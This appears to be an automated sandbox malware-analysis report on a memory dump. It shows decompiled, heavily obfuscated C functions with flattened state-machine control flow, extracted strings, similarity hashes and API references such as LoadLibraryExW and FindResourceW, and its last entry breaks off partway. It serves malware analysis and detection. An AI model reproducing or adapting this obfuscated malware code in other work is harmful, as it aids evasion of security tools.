0x00c98367
0x00c98371
0x00c9878e
0x00c9878e
0x00c9878e
0x00000000
0x00c9879a

Strings

J, xrefs: 00C98279
%2?, xrefs: 00C9800B
f/M, xrefs: 00C97C85
0x, xrefs: 00C97B25
}i, xrefs: 00C982AE
j, xrefs: 00C9802F
fW, xrefs: 00C97671
}j, xrefs: 00C97ADB
(_C, xrefs: 00C97F9C
]q<x, xrefs: 00C97709
`dF, xrefs: 00C981DD
~J , xrefs: 00C97D53
-&, xrefs: 00C981D2
5(y, xrefs: 00C97AFD
, xrefs: 00C977AA

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $ J$%2?$(_C$-&$0x$5(y$]q<x$`dF$f/M$fW$j$}i$}j$~J
API String ID: 0-1192029311
Opcode ID: ef26b3396a9ece8c7f8d08be7158b11667e40954964a46f5995806889f6ccac2
Instruction ID: 638d28738ed3bb5ae5c94e05dee53c1f689f3ae9446dda120106bb13f268b3dc
Opcode Fuzzy Hash: ef26b3396a9ece8c7f8d08be7158b11667e40954964a46f5995806889f6ccac2
Instruction Fuzzy Hash: 0492FF715093818FD7B8CF65C58AB9BBBE1BBC5304F10891DE2DA86260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00C9EC27, Relevance: 17.8, Strings: 14, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00C9EC27() {
				void* _t331;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t348;
				void* _t356;
				signed int _t398;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t411;
				signed int* _t415;

				 *_t415 = 0x2ff1b4;
				 *_t415 =  *_t415 ^ 0xfb7fa6b0;
				_t356 = 0x7034cb8;
				 *_t415 =  *_t415 << 0xb;
				 *_t415 =  *_t415 + 0xffff0add;
				 *_t415 =  *_t415 ^ 0x82b72adc;
				_t415[0x14] = 0xbf0c8a;
				_t415[0x14] = _t415[0x14] ^ 0x006819fa;
				_t415[0x14] = _t415[0x14] << 1;
				_t415[0x14] = _t415[0x14] ^ 0x01ae2ae1;
				_t415[7] = 0x4b071f;
				_t415[7] = _t415[7] + 0xf3fd;
				_t415[0xb] = _t415[7] * 0x72;
				_t415[0xb] = _t415[0xb] + 0x6430;
				_t415[0xb] = _t415[0xb] ^ 0x21d636ab;
				_t415[0x19] = 0x60fe16;
				_t401 = 0x71;
				_t415[0x1a] = _t415[0x19] / _t401;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d295b7;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d72c2a;
				_t415[0x1e] = 0xef1996;
				_t415[0x1e] = _t415[0x1e] << 0x10;
				_t415[0x1e] = _t415[0x1e] ^ 0x1993fea0;
				_t415[0x16] = 0xfd2420;
				_t415[0x16] = _t415[0x16] << 0xc;
				_t415[0x16] = _t415[0x16] ^ 0x923e3d3c;
				_t415[0x16] = _t415[0x16] ^ 0x4078d4fe;
				_t415[0x23] = 0x506b21;
				_t415[0x23] = _t415[0x23] << 2;
				_t415[0x23] = _t415[0x23] ^ 0x0143b977;
				_t415[0x1c] = 0x53eeda;
				_t415[0x1c] = _t415[0x1c] >> 6;
				_t402 = 0x6b;
				_t415[0x1c] = _t415[0x1c] / _t402;
				_t415[0x1c] = _t415[0x1c] ^ 0x000e3127;
				_t415[9] = 0x7cf73b;
				_t415[9] = _t415[9] + 0xdf44;
				_t415[9] = _t415[9] ^ 0xb8aac642;
				_t403 = 0x62;
				_t415[0x24] = _t415[0x24] & 0x00000000;
				_t415[8] = _t415[9] / _t403;
				_t415[8] = _t415[8] ^ 0x01e7107a;
				_t415[0x1a] = 0xb1d3c8;
				_t404 = 0x32;
				_t415[0x1a] = _t415[0x1a] * 0x63;
				_t415[0x1a] = _t415[0x1a] + 0xffff41e1;
				_t415[0x1a] = _t415[0x1a] ^ 0x44c3ceda;
				_t415[0xf] = 0x67a0a3;
				_t415[0xf] = _t415[0xf] >> 5;
				_t415[0xf] = _t415[0xf] * 0x25;
				_t415[0xf] = _t415[0xf] + 0xffffd46f;
				_t415[0xf] = _t415[0xf] ^ 0x0079d095;
				_t415[0x20] = 0x939f69;
				_t415[0x20] = _t415[0x20] >> 9;
				_t415[0x20] = _t415[0x20] ^ 0x000645bf;
				_t415[0xd] = 0x6e98c3;
				_t415[0xd] = _t415[0xd] + 0x1b48;
				_t415[0xd] = _t415[0xd] / _t404;
				_t415[0xd] = _t415[0xd] + 0x30f9;
				_t415[0xd] = _t415[0xd] ^ 0x000343da;
				_t415[9] = 0xd47c54;
				_t405 = 0x11;
				_t415[0xa] = _t415[9] * 0x6b;
				_t415[0xa] = _t415[0xa] + 0x327b;
				_t415[0xa] = _t415[0xa] ^ 0x58de0f5c;
				_t415[0x14] = 0xbee5f4;
				_t415[0x14] = _t415[0x14] + 0x4a9a;
				_t415[0x14] = _t415[0x14] ^ 0xc7bb3bda;
				_t415[0x14] = _t415[0x14] ^ 0xc703792a;
				_t415[0x18] = 0x5f34c8;
				_t415[0x18] = _t415[0x18] >> 8;
				_t415[0x18] = _t415[0x18] + 0xdb9e;
				_t415[0x18] = _t415[0x18] ^ 0x000f0254;
				_t415[0x13] = 0x654d4c;
				_t415[0x13] = _t415[0x13] | 0x499231ac;
				_t415[0x13] = _t415[0x13] << 6;
				_t415[0x13] = _t415[0x13] ^ 0x7dd8fb23;
				_t415[0x22] = 0x533eec;
				_t415[0x22] = _t415[0x22] + 0xffff246b;
				_t415[0x22] = _t415[0x22] ^ 0x0053814d;
				_t415[6] = 0xb05f93;
				_t415[6] = _t415[6] ^ 0xf9d4ab47;
				_t415[6] = _t415[6] + 0xffff6279;
				_t415[6] = _t415[6] >> 8;
				_t415[6] = _t415[6] ^ 0x00fd3243;
				_t415[0x20] = 0xf7b530;
				_t415[0x20] = _t415[0x20] + 0xa986;
				_t415[0x20] = _t415[0x20] ^ 0x00f31461;
				_t415[0xb] = 0xc0c98a;
				_t415[0xb] = _t415[0xb] | 0xbc477ada;
				_t415[0xb] = _t415[0xb] ^ 0xd17e365f;
				_t415[0xb] = _t415[0xb] + 0xfbc8;
				_t415[0xb] = _t415[0xb] ^ 0x6db6a54b;
				_t415[0x11] = 0x3df948;
				_t415[0x11] = _t415[0x11] | 0x554c1cf4;
				_t415[0x11] = _t415[0x11] + 0xffff3939;
				_t415[0x11] = _t415[0x11] + 0x48bd;
				_t415[0x11] = _t415[0x11] ^ 0x557d8b89;
				_t415[0x17] = 0x443079;
				_t415[0x17] = _t415[0x17] << 6;
				_t415[0x17] = _t415[0x17] / _t405;
				_t415[0x17] = _t415[0x17] ^ 0x01083066;
				_t415[0x15] = 0x197a36;
				_t406 = 0x79;
				_t415[0x15] = _t415[0x15] / _t406;
				_t415[0x15] = _t415[0x15] | 0x00ca3701;
				_t415[0x15] = _t415[0x15] ^ 0x00cb182f;
				_t415[0x24] = 0x32bd0;
				_t407 = 0x6d;
				_t415[0x24] = _t415[0x24] * 0x68;
				_t415[0x24] = _t415[0x24] ^ 0x014cc366;
				_t415[8] = 0x233702;
				_t415[8] = _t415[8] / _t407;
				_t415[8] = _t415[8] + 0x77c9;
				_t415[8] = _t415[8] >> 0xb;
				_t415[8] = _t415[8] ^ 0x00057e5d;
				_t415[0xd] = 0x94260a;
				_t415[0xd] = _t415[0xd] ^ 0xf3ede0d3;
				_t408 = 0x42;
				_t415[0xc] = _t415[0xd] / _t408;
				_t415[0xc] = _t415[0xc] | 0xb02b0b60;
				_t415[0xc] = _t415[0xc] ^ 0xb3b4ff54;
				_t415[6] = 0x5dace2;
				_t415[6] = _t415[6] >> 6;
				_t415[6] = _t415[6] ^ 0x49279530;
				_t398 = _t415[0x1c];
				_t354 = _t415[0x1c];
				_t413 = _t415[0x1c];
				_t409 = _t415[0x1c];
				_t415[6] = _t415[6] * 0x58;
				_t415[6] = _t415[6] ^ 0x2550aeb3;
				_t415[0xe] = 0x734937;
				_t415[0xe] = _t415[0xe] >> 4;
				_t415[0xe] = _t415[0xe] * 0x46;
				_t415[0xe] = _t415[0xe] + 0xffffec0c;
				_t415[0xe] = _t415[0xe] ^ 0x01f29f0c;
				_t415[0x1e] = 0x9dde4a;
				_t415[0x1e] = _t415[0x1e] << 2;
				_t415[0x1e] = _t415[0x1e] ^ 0x027408c1;
				_t415[0x11] = 0x514540;
				_t415[0x11] = _t415[0x11] * 0x64;
				_t415[0x11] = _t415[0x11] >> 8;
				_t415[0x11] = _t415[0x11] * 0x12;
				_t415[0x11] = _t415[0x11] ^ 0x0230d1c1;
				while(1) {
					_t331 = 0x60477d;
					L2:
					while(_t356 != 0x588675) {
						if(_t356 == _t331) {
							_t337 = E00CA4D8D(_t354, _t415[0xf], _t415[0xd], _t409,  &(_t415[0x26]), _t398, _t415[0x24], _t356, _t415[0xd], _t356, _t356, _t415[0x10]);
							_t415 =  &(_t415[0xb]);
							__eflags = _t337;
							if(_t337 == 0) {
								_t338 = _t415[0x24];
							} else {
								_t411 = _t398;
								while(1) {
									__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
									if( *((intOrPtr*)(_t411 + 4)) != 4) {
										goto L17;
									}
									L16:
									_t341 = E00CA17CB(_t411 + 0xc, _t415[0x18], _t415[0x15], _t413);
									__eflags = _t341;
									if(_t341 == 0) {
										_t338 = 1;
										_t415[0x24] = 1;
									} else {
										goto L17;
									}
									L22:
									_t409 = _t415[0x1c];
									goto L23;
									L17:
									_t340 =  *_t411;
									__eflags = _t340;
									if(_t340 == 0) {
										_t338 = _t415[0x24];
									} else {
										_t411 = _t411 + _t340;
										__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
										if( *((intOrPtr*)(_t411 + 4)) != 4) {
											goto L17;
										}
									}
									goto L22;
								}
							}
							L23:
							__eflags = _t338;
							if(__eflags == 0) {
								_t331 = 0x60477d;
								_t356 = 0x60477d;
								continue;
							} else {
								E00CAA2AB( *((intOrPtr*)( *0xcb604c + 0x34)), _t415[7]);
								_t356 = 0xc6b09ff;
								while(1) {
									_t331 = 0x60477d;
									goto L2;
								}
							}
							L33:
						} else {
							if(_t356 == 0x19b0515) {
								_t409 = 0x1000;
								_push(_t356);
								_t415[0x1e] = 0x1000;
								_t398 = E00C9F38A(0x1000);
								_t331 = 0x60477d;
								__eflags = _t398;
								_t356 =  !=  ? 0x60477d : 0x8867a89;
								continue;
							} else {
								if(_t356 == 0x7034cb8) {
									_t356 = 0x7eb64e3;
									continue;
								} else {
									if(_t356 == 0x7eb64e3) {
										E00CAD617( &(_t415[0x27]), __eflags, _t415[0x1a], _t415[0x1d]);
										_t348 = E00CA3FAE( &(_t415[0x29]), _t415[0x1a], _t415[0x26], _t415[0x1e], _t415[0xa]);
										_t413 = _t348;
										_t415 =  &(_t415[5]);
										_t356 = 0x588675;
										 *((short*)(_t348 - 2)) = 0;
										while(1) {
											_t331 = 0x60477d;
											goto L2;
										}
									} else {
										if(_t356 == 0x8867a89) {
											E00CAA566(_t415[0x1e], _t415[0x11], _t354);
										} else {
											if(_t356 != 0xc6b09ff) {
												L29:
												__eflags = _t356 - 0xd51710d;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E00C92043(_t398, _t415[0xe], _t415[7], _t415[0xe]);
												_t356 = 0x8867a89;
												while(1) {
													_t331 = 0x60477d;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L32:
						__eflags = 0;
						return 0;
						goto L33;
					}
					_push(_t356);
					_t335 = E00CA199D(_t415[0x23],  &(_t415[0x2d]), _t415[0x17], _t415[0x27], _t415[0x13], 0x2000000, 1, _t415[0x1b] | 0x00000006, _t415[0xd], _t415[0xa]);
					_t354 = _t335;
					_t415 =  &(_t415[0xa]);
					__eflags = _t335 - 0xffffffff;
					if(__eflags == 0) {
						_t356 = 0xd51710d;
						_t331 = 0x60477d;
						goto L29;
					} else {
						_t356 = 0x19b0515;
						continue;
					}
					goto L32;
				}
			}

0x00c9ec2d
0x00c9ec36
0x00c9ec3d
0x00c9ec42
0x00c9ec46
0x00c9ec4d
0x00c9ec54
0x00c9ec5c
0x00c9ec64
0x00c9ec68
0x00c9ec70
0x00c9ec78
0x00c9ec89
0x00c9ec8d
0x00c9ec95
0x00c9ec9d
0x00c9ecab
0x00c9ecb0
0x00c9ecb6
0x00c9ecbe
0x00c9ecc6
0x00c9ecce
0x00c9ecd3
0x00c9ecdb
0x00c9ece3
0x00c9ece8
0x00c9ecf0
0x00c9ecf8
0x00c9ed03
0x00c9ed0b
0x00c9ed16
0x00c9ed1e
0x00c9ed27
0x00c9ed2c
0x00c9ed32
0x00c9ed3a
0x00c9ed42
0x00c9ed4a
0x00c9ed56
0x00c9ed59
0x00c9ed63
0x00c9ed67
0x00c9ed6f
0x00c9ed7e
0x00c9ed7f
0x00c9ed83
0x00c9ed8b
0x00c9ed93
0x00c9ed9b
0x00c9eda5
0x00c9eda9
0x00c9edb1
0x00c9edb9
0x00c9edc4
0x00c9edcc
0x00c9edd7
0x00c9eddf
0x00c9eded
0x00c9edf1
0x00c9edfb
0x00c9ee03
0x00c9ee1a
0x00c9ee1d
0x00c9ee21
0x00c9ee29
0x00c9ee31
0x00c9ee39
0x00c9ee41
0x00c9ee49
0x00c9ee51
0x00c9ee59
0x00c9ee5e
0x00c9ee66
0x00c9ee6e
0x00c9ee76
0x00c9ee7e
0x00c9ee83
0x00c9ee8b
0x00c9ee96
0x00c9eea1
0x00c9eeac
0x00c9eeb4
0x00c9eebc
0x00c9eec4
0x00c9eec9
0x00c9eed1
0x00c9eedc
0x00c9eee7
0x00c9eef2
0x00c9eefa
0x00c9ef02
0x00c9ef0a
0x00c9ef12
0x00c9ef1a
0x00c9ef22
0x00c9ef2a
0x00c9ef32
0x00c9ef3a
0x00c9ef42
0x00c9ef4a
0x00c9ef57
0x00c9ef5b
0x00c9ef63
0x00c9ef6f
0x00c9ef74
0x00c9ef7a
0x00c9ef82
0x00c9ef8a
0x00c9ef9d
0x00c9efa0
0x00c9efa7
0x00c9efb2
0x00c9efc2
0x00c9efc6
0x00c9efce
0x00c9efd3
0x00c9efdb
0x00c9efe3
0x00c9efef
0x00c9eff2
0x00c9eff6
0x00c9effe
0x00c9f006
0x00c9f00e
0x00c9f013
0x00c9f020
0x00c9f024
0x00c9f028
0x00c9f02c
0x00c9f030
0x00c9f034
0x00c9f03c
0x00c9f044
0x00c9f04e
0x00c9f052
0x00c9f05a
0x00c9f062
0x00c9f06a
0x00c9f06f
0x00c9f077
0x00c9f084
0x00c9f088
0x00c9f092
0x00c9f096
0x00c9f09e
0x00c9f09e
0x00000000
0x00c9f0a3
0x00c9f0b1
0x00c9f1be
0x00c9f1c3
0x00c9f1c6
0x00c9f1c8
0x00c9f1ff
0x00c9f1ca
0x00c9f1ca
0x00c9f1cc
0x00c9f1cc
0x00c9f1d0
0x00000000
0x00000000
0x00c9f1d2
0x00c9f1de
0x00c9f1e5
0x00c9f1e7
0x00c9f1f5
0x00c9f1f6
0x00000000
0x00000000
0x00000000
0x00c9f20f
0x00c9f20f
0x00000000
0x00c9f1e9
0x00c9f1e9
0x00c9f1eb
0x00c9f1ed
0x00c9f208
0x00c9f1ef
0x00c9f1ef
0x00c9f1cc
0x00c9f1d0
0x00000000
0x00000000
0x00c9f1d0
0x00000000
0x00c9f1ed
0x00c9f1cc
0x00c9f213
0x00c9f213
0x00c9f215
0x00c9f23b
0x00c9f240
0x00000000
0x00c9f217
0x00c9f22b
0x00c9f231
0x00c9f09e
0x00c9f09e
0x00000000
0x00c9f09e
0x00c9f09e
0x00000000
0x00c9f0b7
0x00c9f0bd
0x00c9f161
0x00c9f16e
0x00c9f170
0x00c9f17a
0x00c9f17c
0x00c9f182
0x00c9f189
0x00000000
0x00c9f0c3
0x00c9f0c9
0x00c9f153
0x00000000
0x00c9f0cf
0x00c9f0d5
0x00c9f11a
0x00c9f139
0x00c9f13e
0x00c9f140
0x00c9f145
0x00c9f14a
0x00c9f09e
0x00c9f09e
0x00000000
0x00c9f09e
0x00c9f0d7
0x00c9f0dd
0x00c9f2b7
0x00c9f0e3
0x00c9f0e9
0x00c9f2a0
0x00c9f2a0
0x00c9f2a6
0x00000000
0x00000000
0x00c9f2ac
0x00c9f0ef
0x00c9f0fd
0x00c9f104
0x00c9f09e
0x00c9f09e
0x00000000
0x00c9f09e
0x00c9f09e
0x00c9f0e9
0x00c9f0dd
0x00c9f0d5
0x00c9f0c9
0x00c9f0bd
0x00c9f2bd
0x00c9f2c0
0x00c9f2c9
0x00000000
0x00c9f2c9
0x00c9f247
0x00c9f27d
0x00c9f282
0x00c9f284
0x00c9f287
0x00c9f28a
0x00c9f296
0x00c9f29b
0x00000000
0x00c9f28c
0x00c9f28c
0x00000000
0x00c9f28c
0x00000000
0x00c9f28a

Strings

{2, xrefs: 00C9EE21
y0D, xrefs: 00C9EF42
@EQ, xrefs: 00C9F077
qQ, xrefs: 00C9F2A0
qQ, xrefs: 00C9F296
7Is, xrefs: 00C9F03C
LMe, xrefs: 00C9EE6E
>S, xrefs: 00C9EE8B
!kP, xrefs: 00C9ECF8
}G`, xrefs: 00C9F09E
}G`, xrefs: 00C9F23B
}G`, xrefs: 00C9F29B
}G`, xrefs: 00C9F17C
0d, xrefs: 00C9EC8D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: qQ$qQ$!kP$0d$7Is$@EQ$LMe$y0D${2$}G`$}G`$}G`$}G`$>S
API String ID: 1586166983-321775154
Opcode ID: e78c055e8f0534b3bfe6667d2dbfe696138911eecd7fcb54f91a10d703bb7c14
Instruction ID: 9c8d94a6dfd3c55e77939541102b66ffd759319f83811bb238e3528fe405932a
Opcode Fuzzy Hash: e78c055e8f0534b3bfe6667d2dbfe696138911eecd7fcb54f91a10d703bb7c14
Instruction Fuzzy Hash: 80F14271508380DFD768CF25C58A65BFBE1FBC4758F108A1DF29A86260D7B58A4ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1F6B, Relevance: 16.9, Strings: 13, Instructions: 604COMMON

Download Yara Rule

Strings

B=&, xrefs: 00CA27B1
2Y, xrefs: 00CA26C7
[ao, xrefs: 00CA202B
~1, xrefs: 00CA24E8
;>-, xrefs: 00CA287F
O;0, xrefs: 00CA2931
s, xrefs: 00CA2545
c, xrefs: 00CA2854
t-!, xrefs: 00CA1FCB
(., xrefs: 00CA225D
[S+, xrefs: 00CA22C9
1{R, xrefs: 00CA2693
)c', xrefs: 00CA286F

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: s$)c'$1{R$2Y$;>-$B=&$O;0$[ao$[S+$c$t-!$~1$(.
API String ID: 0-3687093388
Opcode ID: e323d4f2e68ea18887b652661582f038bf26bb15e30cafa24addf97fe9698a0b
Instruction ID: adfd27c0fbeef57b3a996aa8bd0a5ae06810a727cc30cfef6d5bc413da4ae056
Opcode Fuzzy Hash: e323d4f2e68ea18887b652661582f038bf26bb15e30cafa24addf97fe9698a0b
Instruction Fuzzy Hash: C9720E725083818FD378CF24C58AB9BBBE1BBC5308F108A1DE5DA96260D7B19949DF53

Uniqueness

Uniqueness Score: -1.00%

Function 00CABFE8, Relevance: 14.2, Strings: 11, Instructions: 420COMMON

Download Yara Rule

Strings

Kn?, xrefs: 00CAC272
@cK, xrefs: 00CAC68B
"k, xrefs: 00CAC4F7
{/, xrefs: 00CAC5C2
+b, xrefs: 00CAC70D
FV, xrefs: 00CAC34B
(Z, xrefs: 00CAC441
1#[, xrefs: 00CAC2BE
I!K, xrefs: 00CAC62B
+b, xrefs: 00CAC82B
N#/y, xrefs: 00CAC03D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: +b$ +b$"k$(Z$1#[$@cK$FV$I!K$Kn?$N#/y${/
API String ID: 0-1219850661
Opcode ID: 5917c7f754f57a4d166f817d1ffbee2753f5fb369be7494f6b54dc959d8aa876
Instruction ID: 42727fba1d65f719adbfbbe750ed5ab0c9726e9bfd3c9c20e4bc66ec29d37cfc
Opcode Fuzzy Hash: 5917c7f754f57a4d166f817d1ffbee2753f5fb369be7494f6b54dc959d8aa876
Instruction Fuzzy Hash: 3F3232725093819FD3A8CF24C98AA9BFBE1FBC5718F10891DE1D986260D7B59948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00C9D223, Relevance: 14.1, Strings: 11, Instructions: 367COMMON

Download Yara Rule

Strings

8, xrefs: 00C9D2AD
lQm, xrefs: 00C9D5A2
_;Y, xrefs: 00C9D378
"E, xrefs: 00C9D407
@`, xrefs: 00C9D719
, xrefs: 00C9D8C7
@`, xrefs: 00C9D8E3
lMr, xrefs: 00C9D2B5
a$c, xrefs: 00C9D6C4
`qJ7, xrefs: 00C9D5DC
VX, xrefs: 00C9D443

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $"E$@`$@`$_;Y$`qJ7$a$c$lMr$lQm$VX$8
API String ID: 0-1043295566
Opcode ID: f117d2f2d2b4dee7817017a5cde353675820104a2d1b5a36fb54e01edde422a3
Instruction ID: 03b87fade4d0d67fe6821d7764d892ff7213a5a3e9c7e44640d5c765dade40b7
Opcode Fuzzy Hash: f117d2f2d2b4dee7817017a5cde353675820104a2d1b5a36fb54e01edde422a3
Instruction Fuzzy Hash: 8E1220B11083809FC768CF65C58AA5BFBE1FBC5748F108A1DF69A96260D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00CB292B, Relevance: 14.0, Strings: 11, Instructions: 257COMMON

Download Yara Rule

Strings

;, xrefs: 00CB2AD8
Ia, xrefs: 00CB2A23
8{5, xrefs: 00CB2A40
%-?, xrefs: 00CB2CB7
5A, xrefs: 00CB2BBD
0s=, xrefs: 00CB2D14
> , xrefs: 00CB2A5A
BZ$, xrefs: 00CB29DD
-Op, xrefs: 00CB2BDE
0s=, xrefs: 00CB2D8D
"IA, xrefs: 00CB2C86

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: "IA$%-?$-Op$0s=$0s=$5A$8{5$> $BZ$$Ia$;
API String ID: 0-1228380503
Opcode ID: f8a68d83b11d28e0bfa57f67c5674b587008aea5185d6f99b2633731fcd09823
Instruction ID: 21b151d100170e7acb6c553d2b3bb65d50e286891dec5b0db277ff9b4a5fe96d
Opcode Fuzzy Hash: f8a68d83b11d28e0bfa57f67c5674b587008aea5185d6f99b2633731fcd09823
Instruction Fuzzy Hash: E1D110B14083809FC768CF65C98A95FBBF1FBC5758F508A1DF29686260C7B58948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB397, Relevance: 12.8, Strings: 10, Instructions: 321COMMON

Download Yara Rule

Strings

N3?, xrefs: 00CAB90C
[,#, xrefs: 00CAB51B
_L, xrefs: 00CAB8B9
,:6, xrefs: 00CAB7CF
vC3, xrefs: 00CAB5BD
v?, xrefs: 00CAB5EB
zo, xrefs: 00CAB479
U, xrefs: 00CAB435
o*, xrefs: 00CAB778
/, xrefs: 00CAB894

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: /$,:6$N3?$[,#$_L$o*$vC3$zo$v?$U
API String ID: 0-2508983956
Opcode ID: f5abd9d8693a6f6533daa25867e42d1f8563901499354d45a903185409db286a
Instruction ID: bc46762d41829dba6da71c744acfcb4bc75e74661b1d87b76f0fcbd31e5d06f3
Opcode Fuzzy Hash: f5abd9d8693a6f6533daa25867e42d1f8563901499354d45a903185409db286a
Instruction Fuzzy Hash: 5102F2B14083819FD3A9CF21C48AA9BFBE1FBC5358F108A1DE5D986220D7B49949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 00CA44AA, Relevance: 12.8, Strings: 10, Instructions: 316COMMON

Download Yara Rule

Strings

^rnd, xrefs: 00CA4802
mF2, xrefs: 00CA46D7
-u, xrefs: 00CA49DB
>z, xrefs: 00CA47BD
O, xrefs: 00CA46F9
rw, xrefs: 00CA4965
[X@, xrefs: 00CA4871
nY, xrefs: 00CA46DF
SJT, xrefs: 00CA4640
sr{, xrefs: 00CA4930

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: mF2$-u$>z$O$SJT$[X@$^rnd$nY$rw$sr{
API String ID: 0-1390466442
Opcode ID: 20bae7b4d37f7abc527217447a867147aa51313b3407b3f6a4a11c27ee230a8b
Instruction ID: 7430b6b8e779b6023d2d3e6e654c0a571bfe36c5e2d40d185ce484bb00da1481
Opcode Fuzzy Hash: 20bae7b4d37f7abc527217447a867147aa51313b3407b3f6a4a11c27ee230a8b
Instruction Fuzzy Hash: EEF11E725093809FD3A8CF65C58AA5BFBF1BBC5748F50890DF2A986260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00C98C09, Relevance: 11.6, Strings: 9, Instructions: 322COMMON

Download Yara Rule

Strings

09, xrefs: 00C9917C
O|L, xrefs: 00C98CC7
y&, xrefs: 00C98DFB
y&, xrefs: 00C98E12
$^;, xrefs: 00C98F21
4y&, xrefs: 00C98D84
yM", xrefs: 00C98D1D
z], xrefs: 00C98D3A
>@, xrefs: 00C99169

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $^;$09$4y&$>@$O|L$y&$y&$yM"$z]
API String ID: 0-2859082777
Opcode ID: 0bbf38bfb31bee4580d696032d93a35425eac71f4c7217825dbade10ccea39a8
Instruction ID: 92f69011fe1adccb30c208d749973276d03fb70fb59e5a8de7a39730081752cb
Opcode Fuzzy Hash: 0bbf38bfb31bee4580d696032d93a35425eac71f4c7217825dbade10ccea39a8
Instruction Fuzzy Hash: 4A02FD724083819FD7A9CF61C58AA8FFBE1BBC5758F108A0DE1D986260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6F18EBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6F18EC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6F18EC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6F18EC96
LoadResource.KERNEL32(00000000,00000000), ref: 6F18ECAE

Part of subcall function 6F18E270: GetLastError.KERNEL32(6F18ED79), ref: 6F18E270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6F18ED9F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 8c0dcd180978777d843e7e984143b2b9b0ef621b6fc3cb7d8c0fc2b8718eb2e8
Instruction ID: 862078ad4098668dc4f39081f70ef80419aaea7e0e1503b3818acbbca2147c2b
Opcode Fuzzy Hash: 8c0dcd180978777d843e7e984143b2b9b0ef621b6fc3cb7d8c0fc2b8718eb2e8
Instruction Fuzzy Hash: 6A51F4B1900219DBDB20CFA4CE80B9DB7F5EF497A4F500259F529A7280D730AB648F59

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F41F, Relevance: 10.3, Strings: 8, Instructions: 333COMMON

Download Yara Rule

Strings

c, xrefs: 00C9F72A
_, xrefs: 00C9F7A0
)h?;, xrefs: 00C9F471
<ix, xrefs: 00C9F5D7
WL, xrefs: 00C9F51F
G8n, xrefs: 00C9F49E
E3, xrefs: 00C9F6F4
g,, xrefs: 00C9F496

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: )h?;$<ix$E3$G8n$WL$c$g,$_
API String ID: 0-720653590
Opcode ID: 9237e12ac9a51c80a40816c5f5a6b049b67e67f0f05285d493a994a58f9c5884
Instruction ID: 8a5acd3bbe3b78357f1cef1f66c274a95bdd3ff4f323ec940277a5d097a3c15b
Opcode Fuzzy Hash: 9237e12ac9a51c80a40816c5f5a6b049b67e67f0f05285d493a994a58f9c5884
Instruction Fuzzy Hash: EBF12F714093819FE368CF61C48AA9FFBE5BBC4748F10891DF29A96260D7B58909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FEA0, Relevance: 10.2, Strings: 8, Instructions: 250COMMON

Download Yara Rule

Strings

BwO, xrefs: 00CA0011
_g, xrefs: 00CA00B4
vd;, xrefs: 00C9FF5B
%Y, xrefs: 00C9FED0
X{, xrefs: 00C9FFB9
L, xrefs: 00C9FF2E
*s, xrefs: 00CA00D4
JU, xrefs: 00CA0097

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
